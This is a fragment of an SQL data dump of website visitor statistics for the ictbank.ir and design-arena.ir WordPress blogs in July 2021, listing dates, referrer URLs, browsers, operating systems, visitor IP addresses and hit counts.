(12130,'2021-07-11','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','171.101.62.37','000',0,2,0),
(12131,'2021-07-11','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','180.251.130.125','000',0,2,0),
(12132,'2021-07-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','223.29.254.51','000',0,1,0),
(12133,'2021-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.46.246','000',0,2,0),
(12134,'2021-07-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12135,'2021-07-11','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','190.115.255.77','000',0,2,0),
(12136,'2021-07-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.239.124.190','000',0,1,0),
(12137,'2021-07-11','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,2,0),
(12138,'2021-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.65.110','000',0,1,0),
(12139,'2021-07-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(12140,'2021-07-11','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12141,'2021-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12142,'2021-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(12143,'2021-07-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(12144,'2021-07-12','http://82.102.9.14:80/blog','Safari','OS X','10.14.6',NULL,NULL,'','195.248.241.142','000',0,4,0),
(12145,'2021-07-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12146,'2021-07-12','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(12147,'2021-07-12','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(12148,'2021-07-12','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','103.127.101.200','000',0,2,0),
(12149,'2021-07-12','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','190.187.1.146','000',0,4,0),
(12150,'2021-07-12','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.137.69.7','000',0,2,0),
(12151,'2021-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.225.190','000',0,2,0),
(12152,'2021-07-12','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Opera','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,3,0),
(12153,'2021-07-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.85.216','000',0,1,0),
(12154,'2021-07-12','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','183.104.105.213','000',0,2,0),
(12155,'2021-07-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(12156,'2021-07-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,2,0),
(12157,'2021-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12158,'2021-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(12159,'2021-07-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12160,'2021-07-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12161,'2021-07-13','http://ictbank.ir/blog','Chromium','Ubuntu','Unknown',NULL,NULL,'','121.46.142.244','000',0,2,0),
(12162,'2021-07-13','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','1.20.147.177','000',0,2,0),
(12163,'2021-07-13','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.161.14.104','000',0,24,0),
(12164,'2021-07-13','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.74','000',0,2,0),
(12165,'2021-07-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.171','000',0,1,0),
(12166,'2021-07-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.8.19.172','000',0,4,0),
(12167,'2021-07-13','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','182.160.116.93','000',0,1,0),
(12168,'2021-07-13','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','68.74.206.182','000',0,4,0),
(12169,'2021-07-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.87.98','000',0,2,0),
(12170,'2021-07-13','https://duckduckgo.com/','Firefox','Windows','10.0',NULL,NULL,'','86.242.98.92','000',0,2,0),
(12171,'2021-07-13','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(12172,'2021-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(12173,'2021-07-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,4,0),
(12174,'2021-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.197.121','000',0,2,0),
(12175,'2021-07-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12176,'2021-07-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.181.149','000',0,1,0),
(12177,'2021-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12178,'2021-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(12179,'2021-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12180,'2021-07-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12181,'2021-07-13','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','81.10.23.146','000',0,2,0),
(12182,'2021-07-13','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','124.89.119.14','000',0,1,0),
(12183,'2021-07-13','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','14.174.43.154','000',0,2,0),
(12184,'2021-07-14','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,2,0),
(12185,'2021-07-14','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.235.50.203','000',0,1,0),
(12186,'2021-07-14','http://ictbank.ir/blog','Safari','Windows','5.0',NULL,NULL,'','82.202.165.100','000',0,1,0),
(12187,'2021-07-14','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','115.73.180.232','000',0,2,0),
(12188,'2021-07-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12189,'2021-07-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','185.151.125.197','000',0,1,0),
(12190,'2021-07-14','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,2,0),
(12191,'2021-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12192,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.102.21','000',0,2,0),
(12193,'2021-07-14','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','51.154.42.99','000',0,2,0),
(12194,'2021-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(12195,'2021-07-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12196,'2021-07-14','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','107.174.164.8','000',0,1,0),
(12197,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.227.209.241','000',0,2,0),
(12198,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.23.177.57','000',0,2,0),
(12199,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.217.130.158','000',0,1,0),
(12200,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.45.170','000',0,2,0),
(12201,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.94.144.43','000',0,2,0),
(12202,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.148.115','000',0,1,0),
(12203,'2021-07-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12204,'2021-07-14','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','45.33.151.106','000',0,2,0),
(12205,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.173.192.56','000',0,1,0),
(12206,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.157.56.98','000',0,1,0),
(12207,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.3.105.119','000',0,1,0),
(12208,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.3.28.253','000',0,2,0),
(12209,'2021-07-14','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','158.69.241.134','000',0,25,0),
(12210,'2021-07-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12211,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(12212,'2021-07-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12213,'2021-07-14','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','85.154.116.94','000',0,2,0),
(12214,'2021-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12215,'2021-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(12216,'2021-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12217,'2021-07-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12218,'2021-07-14','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','163.172.70.215','000',0,1,0),
(12219,'2021-07-14','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','194.213.120.14','000',0,2,0),
(12220,'2021-07-14','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','62.215.38.185','000',0,2,0),
(12221,'2021-07-15','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','47.242.37.105','000',0,1,0),
(12222,'2021-07-15','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','163.172.70.215','000',0,2,0),
(12223,'2021-07-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.156.17.208','000',0,2,0),
(12224,'2021-07-15','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','42.193.16.135','000',0,1,0),
(12225,'2021-07-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','182.230.186.226','000',0,2,0),
(12226,'2021-07-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.221.234.59','000',0,2,0),
(12227,'2021-07-15','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','138.122.195.212','000',0,13,0),
(12228,'2021-07-15','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','37.72.186.206','000',0,2,0),
(12229,'2021-07-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12230,'2021-07-15','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.24','000',0,3,0),
(12231,'2021-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.64.246','000',0,2,0),
(12232,'2021-07-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.237','000',0,2,0),
(12233,'2021-07-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12234,'2021-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,3,0),
(12235,'2021-07-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.192.88','000',0,1,0),
(12236,'2021-07-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.204.24.206','000',0,2,0),
(12237,'2021-07-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','177.247.96.50','000',0,2,0),
(12238,'2021-07-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12239,'2021-07-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.81.60.120','000',0,1,0),
(12240,'2021-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12241,'2021-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(12242,'2021-07-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12243,'2021-07-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.33.86.151','000',0,2,0),
(12244,'2021-07-16','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','177.158.254.185','000',0,2,0),
(12245,'2021-07-16','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','37.0.11.107','000',0,1,0),
(12246,'2021-07-16','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','167.114.5.51','000',0,3,0),
(12247,'2021-07-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.208','000',0,1,0),
(12248,'2021-07-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.50','000',0,1,0),
(12249,'2021-07-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','217.171.147.164','000',0,6,0),
(12250,'2021-07-16','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','78.108.158.37','000',0,1,0),
(12251,'2021-07-16','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','179.66.31.156','000',0,2,0),
(12252,'2021-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.204.24.206','000',0,2,0),
(12253,'2021-07-16','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','42.116.148.190','000',0,2,0),
(12254,'2021-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.218.108','000',0,2,0),
(12255,'2021-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.8.19.172','000',0,2,0),
(12256,'2021-07-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12257,'2021-07-16','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','45.12.223.138','000',0,8,0),
(12258,'2021-07-16','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,3,0),
(12259,'2021-07-16','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','182.232.243.135','000',0,1,0),
(12260,'2021-07-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.228.161','000',0,1,0),
(12261,'2021-07-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12262,'2021-07-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(12263,'2021-07-16','http://www.ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.4.163.148','000',0,5,0),
(12264,'2021-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(12265,'2021-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12266,'2021-07-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12267,'2021-07-16','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12268,'2021-07-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.27.134','000',0,2,0),
(12269,'2021-07-16','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','172.58.141.19','000',0,2,0),
(12270,'2021-07-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,2,0),
(12271,'2021-07-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','216.131.109.14','000',0,7,0),
(12272,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.220.149.9','000',0,1,0),
(12273,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.220.149.18','000',0,1,0),
(12274,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.55.185.64','000',0,2,0),
(12275,'2021-07-17','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','189.171.183.39','000',0,2,0),
(12276,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,1,0),
(12277,'2021-07-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12278,'2021-07-17','https://www.google.com/','Safari','iOS','14.6',NULL,NULL,'','68.225.166.122','000',0,3,0),
(12279,'2021-07-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12280,'2021-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.19.255.178','000',0,1,0),
(12281,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.37.16','000',0,2,0),
(12282,'2021-07-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12283,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','216.131.109.14','000',0,3,0),
(12284,'2021-07-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12285,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.41.52','000',0,1,0),
(12286,'2021-07-17','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','121.121.116.201','000',0,2,0),
(12287,'2021-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12288,'2021-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(12289,'2021-07-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(12290,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.16.222.193','000',0,1,0),
(12291,'2021-07-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.207.252.157','000',0,2,0),
(12292,'2021-07-17','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.54','000',0,1,0),
(12293,'2021-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','18.218.48.68','000',0,2,0),
(12294,'2021-07-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.132.58.105','000',0,1,0),
(12295,'2021-07-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12296,'2021-07-18','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','45.9.110.186','000',0,2,0),
(12297,'2021-07-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12298,'2021-07-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12299,'2021-07-18','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.100','000',0,1,0),
(12300,'2021-07-18','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.36','000',0,1,0),
(12301,'2021-07-18','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','212.129.152.41','000',0,2,0),
(12302,'2021-07-18','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','42.192.17.155','000',0,2,0),
(12303,'2021-07-18','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','42.193.8.97','000',0,3,0),
(12304,'2021-07-18','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','78.186.188.25','000',0,2,0),
(12305,'2021-07-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(12306,'2021-07-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.237','000',0,2,0),
(12307,'2021-07-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.182.62','000',0,1,0),
(12308,'2021-07-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.199.23','000',0,2,0),
(12309,'2021-07-18','http://ictbank.ir/','Sogou Explorer','Windows','5.1',NULL,NULL,'','213.152.161.170','000',0,2,0),
(12310,'2021-07-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.214','000',0,2,0),
(12311,'2021-07-18','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.236.174.92','000',0,1,0),
(12312,'2021-07-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,6,0),
(12313,'2021-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(12314,'2021-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(12315,'2021-07-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12316,'2021-07-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,4,0),
(12317,'2021-07-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(12318,'2021-07-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.248.17.208','000',0,1,0),
(12319,'2021-07-19','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','188.163.17.8','000',0,2,0),
(12320,'2021-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.119.129.90','000',0,2,0),
(12321,'2021-07-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.16.222.193','000',0,1,0),
(12322,'2021-07-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','188.165.229.219','000',0,2,0),
(12323,'2021-07-19','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','193.60.133.195','000',0,2,0),
(12324,'2021-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,3,0),
(12325,'2021-07-19','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.120.2','000',0,2,0),
(12326,'2021-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,4,0),
(12327,'2021-07-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12328,'2021-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(12329,'2021-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(12330,'2021-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12331,'2021-07-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12332,'2021-07-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12333,'2021-07-19','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','14.233.229.106','000',0,2,0),
(12334,'2021-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12335,'2021-07-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12336,'2021-07-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,2,0),
(12337,'2021-07-20','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','185.147.214.142','000',0,2,0),
(12338,'2021-07-20','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.12','000',0,2,0),
(12339,'2021-07-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12340,'2021-07-20','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','181.188.165.159','000',0,2,0),
(12341,'2021-07-20','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','89.109.35.231','000',0,6,0),
(12342,'2021-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12343,'2021-07-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','52.70.4.246','000',0,1,0),
(12344,'2021-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(12345,'2021-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(12346,'2021-07-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(12347,'2021-07-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.162','000',0,2,0),
(12348,'2021-07-20','http://design-arena.ir/blog','Chrome','Android','9',NULL,NULL,'','61.135.15.138','000',0,2,0),
(12349,'2021-07-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','116.90.73.14','000',0,3,0),
(12350,'2021-07-20','https://duckduckgo.com/','Chrome','Android','9',NULL,NULL,'','78.159.113.193','000',0,3,0),
(12351,'2021-07-21','http://82.102.9.14:80','Kazehakase','Fedora','10',NULL,NULL,'','198.84.122.140','000',0,4,0),
(12352,'2021-07-21','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.4.163.148','000',0,1,0),
